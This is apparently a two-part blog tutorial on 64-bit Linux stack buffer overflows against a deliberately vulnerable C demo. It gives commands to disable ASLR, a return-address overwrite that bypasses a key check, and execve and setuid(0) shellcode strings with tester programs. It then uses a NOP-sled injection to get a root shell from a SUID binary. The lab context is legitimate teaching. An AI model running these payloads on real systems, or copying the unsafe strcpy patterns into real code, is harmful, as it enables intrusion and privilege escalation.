Sunday, July 28, 2024

Buffer overflow: Tips, Tricks & Traps [part II]

 

0x1.0x2 ShellCodes

In hacking, a shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine, but any piece of code that performs a similar task can be called shellcode. Shellcode is commonly written in machine code. (Wikipedia)

Shellcode is a type of ByteCode, i.e. a source code in pure machine code!
Actually, a shellcode is a bytecode that executes a command shell: An "environment" that I can execute system commands.

In order to be able to create a working Shellcode you have (mainly) two choices:
  1. Create an assembly program, compile & link it and get its machine code generated or
  2. Do the same with a C or C++ program
Let's follow the more core method: to create a shell code from an assembly program.
There many shellcodes available, in many places on internet. A well know place is here: https://www.exploit-db.com/


Below we have a shellcode that will spawn a Bash Shell in assembly language: 
;
;
; Source: https://www.exploit-db.com/exploits/47008
;
; Compile: nasm -felf64 spawn_shell.nasm -o spawn_shell.o
; Link: ld spawn_shell.o -o spawn_shell
;-----------------------------------------------------------
;
global _start

section .text

_start:

    ;int execve(const char *filename, char *const argv[],char *const envp[])
    xor     rsi,    rsi            ;clear rsi
    push    rsi                ;push null on the stack
    mov     rdi,    0x68732f2f6e69622f     ;/bin//sh in reverse order
    push    rdi
    push    rsp    
    pop    rdi                ;stack pointer to /bin//sh
    mov     al,    59            ;sys_execve
    cdq                    ;sign extend of eax
    syscall

I create a very simple script to compile the program and to display the corresponding byte code:
Bash:
echo '\033[33;1mCompiling...\033[0m'
nasm -f elf64 -o $1.o $1.asm
ld -o $1 $1.o
echo 'ok'
echo
echo '\033[33;1mAssembly code:\033[0m'
objdump -M intel -d $1
echo
Then, I compile this as: 

The bytecode (or the machine code) above is represented as a series of hexadecimal numbers, that they are actually a series or bytes or to be more specific, a series of bits, aka know as 0 and 1. This is why we call it a machine code.
The only task left to do now is to get this bytecode and put it in a string, as below:
"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05"
Note the hexadecimal format here. Does reminds you something from Part I (paragraph "0x1.0x1. The ROP approach")? 
The main idea here is this: We want to put this bytecode in memory and execute it as a program.

NOTES
:
  • We have different bytecodes and specficaly shellcodes for 64bit and 32bit architectures.
  • A shellcode that runs correctly in a 32bit system cannot be run on a 64bit system.
  • To be able to run a bytecode that is located on stack we have to enable the ability of the system to allow to run code on non-executable memory location. This can be done (for example) by using the -z execstack flag in the gcc compiler.
  • A shellcode that is run on a system (for example in a CentOS x64 box) it is not 100% guaranteed to run on another system with the same architecture, for example in an Ubuntux64 box.
Another question that many people ask is: How to test my shellcode?

Well, I have to methods to test the shellcodes and I will provided both in this article.

0x01.0x.2.0x1 Testing a shellcode - method I

This code is used to provide a C template to paste shellcode into and be able to run it live from within an ELF x64 binary's char buffer. This allows you to create a buffer with the shellcode globally and this program will mark it as RWX using mprotect() and then finally jump into.
C:
/**********************************************************************
*
* Program: tester64.xss.org.c
*
* Initial Date: 08/06/2021
* Mod my Geometry: change to work on 64bit (10/04/2023)
*
* Initial Author: Travis Phillips
*
* Purpose: This code is used to provide a C template to paste shellcode
*          into and be able to run it live from within an ELF x64 binary's
*          char buffer. This allows you to create a buffer with the
*          shellcode globally and this program will mark it as RWX using
*          mprotect() and then finally jump into.
*
* Compile: gcc -m64 tester64xss.org.c -o tester64.xss.org
*
***********************************************************************/
#include <stdio.h>
#include <unistd.h>
#include <sys/mman.h>
#include <string.h>

/////////////////////////////////////////////////////
//  source file: execve(/bin/sh)
/////////////////////////////////////////////////////
char payload[]="\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05";


int main() {

   // Print the banner.
    puts("\n\033[33;1m---===[ Shellcode Tester x64 Stub v1.1 ]===---\033[0m\n");
 
    // Print the size of the shellcode.
    printf(" [\033[34;1m*\033[0m] Shellcode Size:  %d\n", sizeof(payload)-1);

    // Create a function pointer to the shellcode and
    // display it to the user.
    void (*payload_ptr)() =  (void(*)())&payload;
    printf(" [\033[34;1m*\033[0m] Shellcode Address: 0x%08x\n", payload_ptr);

    // Calculate the address to the start of the page for the
    // the shellcode.
    void *page_offset = (void *)((long)payload_ptr & ~(getpagesize()-1));
    printf(" [\033[34;1m*\033[0m] Shellcode page: 0x%08x\n", page_offset);

    // Use mprotect to mark that page as RWX.
    mprotect(page_offset, 4096, PROT_READ|PROT_WRITE|PROT_EXEC);

    // Finally, use our function pointer to jump into our payload.
    puts("\n\033[33;1m---------[ Begin Shellcode Execution ]---------\033[0m");
    payload_ptr();

    // We likely won't get here, but might as well include it just in case.
    puts("\033[33;1m---------[  End Shellcode Execution  ]---------\033[0m");
    return 0;
}

As you can see in comments, we do not use the -z execstack in the compilation because we force the program to consider the memory as RWX (Read Write Execute) using mprotect().
The execution and test is straight forward: 

Notes:
  • You cannot use the above to test 32bit shellcodes.
  • BUT, it is SUPER easy to change the program for 32bit shellcode testing: You only need to change the line 47 from:
    void *page_offset = (void *)((long)payload_ptr & ~(getpagesize()-1));
    to:
    void *page_offset = (void *)((int)payload_ptr & ~(getpagesize()-1));
  • The shell code must not contain the byte 00 because the program will consider this as terminator and will stop its execution. This feature produces one of the most headaches when creating shellcodes. There are several methods we can use to avoid the 00 byte (such as XORing) but this is something beyond the scope of the current article.

0x01.0x.2.0x2 Testing a shellcode - method II

This is a very common method that almost all (normal??) people use to test shellcodes. 
It is far more simpler and requires to set some compiler flags (that we already explain in Part I of this series).
This is the code:
C:
//  tester2-xss.is.c
//  source file: https://www.exploit-db.com/exploits/47008
//  Linux/x86_64 - execve(/bin/sh)
//  payload size: 22 bytes
//
// compile with:   gcc -w -m64 -g -fno-stack-protector -z execstack -o tester2-xss.is tester2-xss.is.c
//////////////////////////////////////////////////

main() {
   char shellcode[] = "\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05";
   (*(void (*)()) shellcode)();
}
More simpler and almost one line of code, huh?
This is the wild beauty of C...  

Again, the testing is straight forward: 

So far, so good.
Let's see now what we can do with these shellcodes...


0x1.0x3 ShellCodes on buffer overflow

Consider the demo C program we used in the part I of this series with a very slight change on the size of the variable key of function checkProductKey at line 5, from 12 bytes to 64 bytes.
I put again here (for clarity) the whole source code:
C:
// demo.c
// (c) Geometry for xss.is 2023
//
// Compile: gcc -m64 -g -fno-stack-protector -z execstack -o demo demo.c
//
#include <stdio.h>
#include <string.h>

int checkProductKey(char *userKey) {
    char key[64];
    strcpy(key, userKey);
    int n = (strcmp(userKey, "123-456") == 0);
    return n;
}

int main(int argc, char* argv[]) {
    char key[255];
    if (argc != 2) {
        printf("Enter product key >");
        scanf("%s",key);
    }
    else
        strcpy(key, argv[1]);


    int iAllow = checkProductKey(key);

    if (!iAllow) {
        printf("Wrong key!\n");
        return -1;
    }

    printf("Welcome to the DEMO SA Application.\n");
    printf("(c) 2023 all rights reserved.\n");
    return 0;
}

By using the method described in Part I we can easily find the RET address and the exploit to redirect the program to bypass the ProductKey checks: 

As you notice, the variable key of function checkProductKey is 64 bytes long.

Our goal is to replace some "A"s with the shellcode bytes and redirect the program inside the buffer itselfI in order to execute the shellcode.

To do this more easily we are going to change the way we add the command line arguments values.
We are going to use a HexEditor for this.
Kali has two very nice HexEditor: The HexEdit and the HexEditor.
But, of course you can choose whatever you like to work with.

I will put the arguments (that I will pass to my program) into a file and I process them with a hex-editor .
Step 1: put the arguments to a file:
python -c 'print("A"*88+"\x55\x55\x55\x55\x52\x61"[::-1])' > args

Now the args file contains the arguments and can manage them via a hex editor by entering this command:
exeditor -b args
Note that the -b flag allows me to make changes (deletion, insertions) in the corresponding file.

Well... this is not exactly what I would like to see. The last character "0A" is the line feed characters that the system put when I make the redirection to the file args.
I don't need it here, so I will remove it!
This is the correct file:

 
Now I can test if my exploit still works by passing the args file as command line parameter:
./demo $(cat args)



It works fine!

Now, let's go to the debugger to explain some more things:


 
We put a breakpoint on line 7 - [b 7] (as in Part I) and we run the program with the command: 
r $(cat args)

What I see here in RED is the instruction that I am currently located, this is, the overwrite of the RET addess with 0x555555555261,  is the one that performs the redirection.
What I see in YELLOW is where "I want to go": I want to put my ShellCode somewhere inside the "A"s and then to change the RET address to points to these address (in yellow box) .

To maximize the possibility for a successful attack I will use an additional trick: I will replace the "A"s with the NOP instruction .
A NOP (hexadecimal 0x90 ) is an instruction to tell to the system to do... nothing, or better, to skip to the next instruction!
Thus, in case that the RET address is not points exactly to the start address of the shellcode but maybe a few address before, but with 90s my shellcode will finally (and hopefully) be executed.

Let's see first, if my exploit work if I replace "A"s with "90"s.:

 Well... Success!
Now let's try to put my shell code (the one I created in the previous paragraph) inside here:
If I delete the "\x" from my shellcode "\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05" I will have this:
4831f65648bf2f62696e2f2f736857545fb03b990f05
Now, I have to put in a good place the above inside my args file and then change the RET address to points to an address before the shellcode but inside the buffer of "90"s (see the Yellow Box in 2 image above).
 


 And finally, YES, as you can see I got a shell by entering my shellcode at the beginning of the args and changing the RET address to the set of possible address I found from debugger.
Note that the STACK addresses I got from the debugger are not guaranteed to be exactly the same from those I have when I run the program form command line . In such cases I have to change a bit the RET address until I got successful shell.


0x1.0x4 Got root?

So far we have a shell with user privileges. But this not our final goal as our main purpose (usually) is to get root... or to get a shell with root privileges.
The question now is: is this possible?

Well, the answer is YES, but under certain conditions.
One such condition is when we run a SUID program.
SUID: stands for Set owner User ID. This is a special permission that applies to scripts or applications. If the SUID bit is set, when the command is run, it's effective UID becomes that of the owner of the file, instead of the user running it. (techrepublic.com)
There some cases when root user give SUID permission to an application because of a specific privileges it requires. In addition some lower level privileges can run a SUID program without the need to own these privileges.
The vulnerability arose from such situation is when the SUID program has a buffer overflow vulnerability and allow the caller to execute command with the SUID privileges...
Thus, can you imagine what will be done if our small demo program had SUID priv/s?

Let's see this in reality.
First of all we make our demo executable SUID as follows:
Code:
sudo -s
chown root demo
chgrp root  demo
chmod 4777 demo


Thus, open a root console, change group and owner of the program to root and then change mode to 4777.

Now our demo program look like this:



According to the SUID logic we explained above, if we execute our shell inside the demo memory context it should return a root shell.
Well, let's try it:

 
Ops!!! 
Oooo No!!! It does not work... I still got shell but with user priv/s!!
But Why??
Well... there is a reason for this:
Many popular implementations of linux sh drop privileges when they start up:
They reset their effective UID to their real UID. This includes 'bash', 'dash', 'mksh' and 'BusyBox' sh, so on Linux you won't see anything else.
Ok, is there is anything we can do about it?
And of course the answer (as usual) is: YES!

We can create a shellcode from an assembly that set the UID to (0) (aka root) and then call the shell. To be more technically specific, see below:
setuid(0); execve(/bin/sh);

Well, it is not necessary to create it from scratch, since, it is already exists here: https://shell-storm.org/shellcode/files/shellcode-77.html
The shellcode is this:
\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c\x58\x0f\x05";

In order to be sure that it will work on our box, I test it with the tester I presented on paragraph 0x1.0x2 "Shellcodes" and I verified that indeed returns a shell. Note that you mus test all shellcodes before you run them in order to check if they are working in your box. Also note that there cases that even the shellcodes return a shell when are running from the tester program, they are not working when passed to the stack. You know, as we said in Part I, sometimes the results are non-deterministic.

Anyway, let's try this new shellcode with our demo program.
The first question is: Is it feet on the buffer?
Well, the above shellcode is 48 bytes and our buffer (the key variable) is 64, so the answer is YES.
OK... lets do it!
Modify the args file and run it...

OOooo YES!
Got Root...

What is Next?

What about to make a Part III about an example in Windows 11 64bit?
Are you still interested?
...



Happy Reversing








 





Saturday, July 27, 2024

Buffer overflow: Tips, Tricks & Traps [part I]

 

0x0. Introduction

A buffer overflow (bof), or buffer overrun, is an anomaly whereby a program, while writing data to a buffer, overruns the buffer's boundary and overwrites adjacent memory locations (Wikipedia).

Well, let's talk about this very old Software Vulnerability and let's see if this still counts.

Since the very first article of Aleph One (Elias Levy) in 1996, " Smashing The Stack For Fun And Profit ", 27 years have been passed. The answer to the question "Is this vulnerability still active?" is a big: YES!
But Indeed, nowadays, with modern Software Development Environments & languages (.Net, J2EE, RoR, etc) it is not so easy to perform such attack, but... the more generic applications that was created in languages that are vulnerable to buffer overflow (such as C or C++) still exist, and they are many: Web servers, Operating Systems, RDBMSs and generally, almost everything our "safe" applications we put to run on...

In this series of articles I will try to explain to newcomers how such attack can be performed in modern environments and Operating Systems.

Since this specific attacks has to cope with memory architecture, OSs architecture and specific compilers implementations there are several assumption we must take.
We will discuss such assumption on every architecture we choose.

NOTE: The examples that you will see here make heavy use of memory addresses. It is very unlike to see the same memory addresses in your systems in case you try to test my examples by your own. This is not a bug, but a feature!

Let's start with Linux... 

0x1. Linux 64bit on 64bit application

Let's create our demo application in C language to complete the test.
The source code is this: 

#include <stdio.h>
#include <string.h>

int checkProductKey(char *userKey) {
    char key[12];
    strcpy(key, userKey);
    int n = (strcmp(userKey, "123-456") == 0);
    return n;
}

int main(int argc, char* argv[]) {
    char key[255];
    if (argc != 2) {
        printf("Enter product key >");
        scanf("%s",key);
    }
    else
        strcpy(key, argv[1]);


    int iAllow = checkProductKey(key);

    if (!iAllow) {
        printf("Wrong key!\n");
        return -1;
    }

    printf("Welcome to the DEMO SA Application.\n");
    printf("(c) 2023 all rights reserved.\n");
    return 0;
}

This very simple demo program will get a product key as input and if the product key is correct will continue to the main flow, otherwise it produces an error and exits.
The input can be given from command line argument or (if no arguments provided) it will ask the user to enter it.

In order to be able to make a successful attack, we make some assumptions by using specific compiler flags.
I compile the program as follows:

gcc -m64 -g -fno-stack-protector -z execstack -o demo demo.c

Let's explain the flags:

  • -m64: create an executable in 64bit architecture (to be honest I could omit this in the specific system since it is used as a default).
  • -g: to produce special metadata for the debugger (that we will use later)
  • -fno-stack-protector: do not perform memory stack checks (protections).
  • -z execstack: allow to execute code on stack segment (in memory).
  • -o demo: name the final executable demo .

The specific example has been implemented in KALI Linux 2022.4



In addition, it is very very important to disable the ASLR ( Address Space Layout Randomization ) protection.
To this, in kali just enter the command as root:

echo 0 > /proc/sys/kernel/randomize_va_space


In any time you want to rollback this ASLR check, just enter this:

echo 2 > /proc/sys/kernel/randomize_va_space


Btw, if you want to check, what is the current state of ASLR, enter this:

sudo cat /proc/sys/kernel/randomize_va_space
  • 0: means OFF
  • 2: means ON


In the following image we can see a normal execution of my small demo program.


As you can see there are two ( at least !!) main vulnerabilities in the program: Is where the vulnerable strcpy function is used and let's see this in practice:



As you can see, this is the way to test if our program is vulnerable to a buffer overflow attack: We give a very large string and then we check the program's response. If we get a 'segmentation fault' then it is possible to have a bof (buffer overflow) vulnerability...

0x1.0x1. The ROP approach

According to Wikipedia: Return-oriented programming (ROP) is a computer security exploit technique that allows an attacker to execute code in the presence of security defenses such as executable space protection and code signing .
Our main goal here is to take advantage of a program's vulnerability in order to redirect the program's flow to where we like (and where we can, of course)...

Let's examine the program's behavior using the gdb debugger.


 
 We put a breakpoint at line 7, immediately after the strcpy , inside the function checkProductKey .


We run the application inside the debugger ( just enter dbg ./demo ) by passing a normal string, in order to check where the RET address is located (more about this below) is...


Let's discuss some "things" here...
The image above is divided into 2 consoles
  • The left console is the program disassembly code that I get after setting the breakpoint at line 7 break 7 and enter disassemble /s main. The "/s" parameter instructs the debugger to produce the assembly code along with the corresponding C source code (thanks to the -g flag on the compilation phase).
  • The right console is the actual console we work on testing the program.
  • Note also one very important thing: the memory addresses (defined in blue color) are the same in both images. This is very tricky thing in real situation because these addresses may not be always the same every time we run out program. This is because of ASLR, and this why we disable it, above, otherwise we may end by hunting... ghosts, believe me!

As you can see in GREEN BOXES we run the program in debugger by passing ten "A"s as argument: run AAAAAAAAAA
This is stored in the stack as the function checkProductKey is called since it is passed as argument to the function.
We can see the stack in memory by entering the x/24xg $rsp command in the debugger. This command instructs the debugger to show in hexadecimal format "x", the next 24 memory positions in giant ("g") 8-bytes format.
The $rsp is the well known Stack Pointer (the old ESP on 32bit systems) where in our case points the variables that passed as arguments inside our function.

The "AAAAAAAAAA" are represented here in hexadecimal format ("x") by the number "41" that the ASCII hexadecimal representation of the letter "A".
Also, note that the 10 "A"s are stored in the memory location in reverse order , since the little endian architecture .
Thus, the actual string that is kept on stack (on memory) is the '41.41.41.41.41.41.41.41.41.41.00' (I put the "." just to make it more readable).
Note that the "00" is the Null Character that denotes the string termination. Remember this "00" because plays an important role (as a barrier) in exploit development in general, and specifically in shellcode (or bytecode) creation (more on this in part II). The main point to know here is this: The reading (or sometimes the execution) of a series of memory locations is stopped when the system meets a 00 byte.

Focus now on RED BOXES and remember where we stand: We are inside the function checkProductKey .
When the function ends, the program's functionality must return to the place that was called. To be more specific: must return to the address of the caller.
In order for the system to remember this address, it stores it in a specific memory location inside the buffer of the current function. We call this address: the RET (RETurn) address . It is one of the most important address of the buffer overflow attacks and is considered as the "holly grail" of any buffer overflow exploitation.
As you can see in the red box on the right console, the RET address is stored at the end of the buffer, after the address of our input string "AAAAAAAAAA" and some other addresses (as the Base Pointer, some environment variables, etc, that they are important... but not so important for now).

As you can imagine if we enter a very big input string, greater than what the system has booked (in our case is 12 - because of the char key[12]; at line 5) then we can overwrite all addresses that follows this variable, including the RET address . This is very important and very tricky!
and this is why:
Suppose that we entered this "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" as input.
Our buffer can hold only the first 12 characters (or bytes in i386 architecture) including the string terminator "00". So what about the remaining characters? they will overwrite the neighboring memory addresses... RET address including.
So the RET address will be filled with "A"s thus "AAAAAAAA" or "4141414141414141".
Note that I choose 8 bytes to denote the address in 64bit systems, on purpose.
In general, you should know that in 64bit systems (as opposed to the 32bit systems) we have:
  • General purpose registers have been expanded to 64-bit. So we now have RAX, RBX, RCX, RDX, RSI, and RDI.
  • Instruction pointer, base pointer, and stack pointer have also been expanded to 64-bit as RIP, RBP, and RSP respectively.
  • Additional registers have been provided: R8 to R15.
  • Pointers are 8-bytes wide.
  • Push/pop on the stack are 8-bytes wide.
  • Maximum canonical address size of 0x00007FFFFFFFFFFF (more on this later).
Consider the RET address in conjunction with another very important address, that is stored on the processor's memory: The Instruction Pointer , or the $RIP . This address always has the address of the next instruction that the program will execute. Thus, when our our functions ends, the $RIP = RET address is executed. Thus, the functionality of the program will return to the caller, since the RET address keeps the caller address, and to be more specific it keeps the address of the next instruction of the one that call the function.

So, in our above theoretical example the RET address will be filled with "4141414141414141", that means that the program, at the end of the checkProductKey function will try to go to the address 0x4141414141414141.
But such address does not exist in our program's context, so we get the well know error: segmentation fault

By having in mind the above knowledge let's try to exploit our program.
By examining the $rsp structure in our initial example (in the image above) we can see the we need 3 x 8 bytes in order to meet the RET address.
Let's prove this with the following example:

 As you can see we enter 24 x"A" = "AAAAAAAAAAAAAAAAAAAAAAAA" and the 8 "B"s "BBBBBBBB" overwrite the RET address.

The program crashed...
What we would like to do actually is to we overwrite $RIP with an invalid address. But, in fact we don’t control $RIP at all. We have control only on the RET as you already see.
For your info you must know this:
The maximum address size we can handle in 64bit architecture is 0x00007FFFFFFFFFFF. What we did, is that we overwriting $RIP (via RET) with the non-canonical address of 0x4242424242424242 which causes the processor to raise an exception.
[If you have problems understanding the situation we are, you can read more about 64bit address architecture here .]


So the goal was to find the offset with which, to overwrite RET and consequently $RIP with a canonical address .
For this reason I use a cyclic patter (say "AAAAAABBBB" etc) and try it until I end up with a needed address (and yes, I know that there are other methods published that calculate the required offset differently, but this one I presented here also works for me ).

So, I will go to replace "BBBBBBBB" with an existing address of the existing source code ( code segment ) in order to bypass the product-key checks.
This address is the following:


This is where all the checks about the product-key has been passed, and this is what I call ROP (see the paragraph title).
I need to replace "B"s with this address: 0x0000555555555261

But I have to pass its value as bytes... not string! How to do this?
There are several ways to pass this string as "bytes" in the debugger:
I will choose the quicker one... take a look here:


 Let's examine a little the attack "string" :

Here I use a bit python v.2 (v.3 also works if I put the print string in "(" and ")" ) command :
python2 -c 'print "1"*24 + "\x55\x55\x55\x55\x52\x61"[::-1]'

Instead of writing an explanation in text here I will show the image of the result when I execute it in command line: 

As you can see, I pass the above results, as a command line argument to the dbg using the run $( <SYSTEM_COMMAND> ) notation.
This is an easy way to pass the command line string as bytes into a program.
The program crashes, but at the end, I made a succefull redirection as you can see the 'Welcome' message (in the green box above). Thus, I bypass the checking mechanism.

Note also, the way that I pass the goal address, in reverse order : the [::-1] python notation just put the hexadecimal string in reverse.
Thus, the " 55.55.55.55.52.61 " will be put in the string arguments as " 61.52.55.55.55.55 " (remember the little endian architecture I mention above).
Important note: the " 555555555261 " is put in the memory in reverse order per pair : the " 55.55.55.55.52.61 " will be put in memory as " 61.52.55.55.55.55 ".
And in general, any memory address we will read, is a series of pairs - or a series of 1 byte (8bits, from 0 to 255 - aka 2^8=256 possible different values)
"Historically, the byte was the number of bits used to encode a single character of text in a computer and for this reason it is the smallest addressable unit of memory in many computer architectures." (wikipedia)
The same applies to i386 64-bit Windows 10 and i386 64-bit Kali Linux .

In addition, the '\x' notation indicates that I am talking to the program not in decimal but in hexadecimal.
I do this because the debugger displays memory addresses in hexadecimal notation.
If you wander why the debugger prefer the hexadecimal notation, I would said this:
The decimal representation of the 555555555261 haxedcimal address is this number: 93824992236129 . Well, it looks more than a telephone number, huh? ;)
So... it is not so easy the human to cope with so big length numbers. The hexadecimal notation is more compaq and censequently managable. This is why has been adopted by (almost) all debuggers in the world to represent addresses.

So far I have performed a "goto" (remember in BASIC the goto statement?) or a JUMP (assembly-wise) by using the bebugger.
What I need now is to do the same in the final executable from the command line in a console, NOT by using the dbg .

Well, the answer looks fair enough: I just run this from command line:


 
As you can see I just open the Welcome screen without entering any product-key and I just created my first exploit of buffer overflow...

Note that the results in the image above it is not always so obvious, especially when we mess with memory addresses and the stack directly. Several times what I see in the debugger is not the exactly the same of what I see when I execute the program directly from command line and this is very common when I have to refer addresses in the stack (and not on the code segment as I did here).
We see such example in the Part II of this series of articles, when I will show how to put a "command shell" in the stack and how to execute it. In addition in Part II we will see what is a a bytecode, how we will create or find some ready-made byte-codes and how we test them. We will see is such cases that the results may be not so deterministic as we would expected...

Happy reversing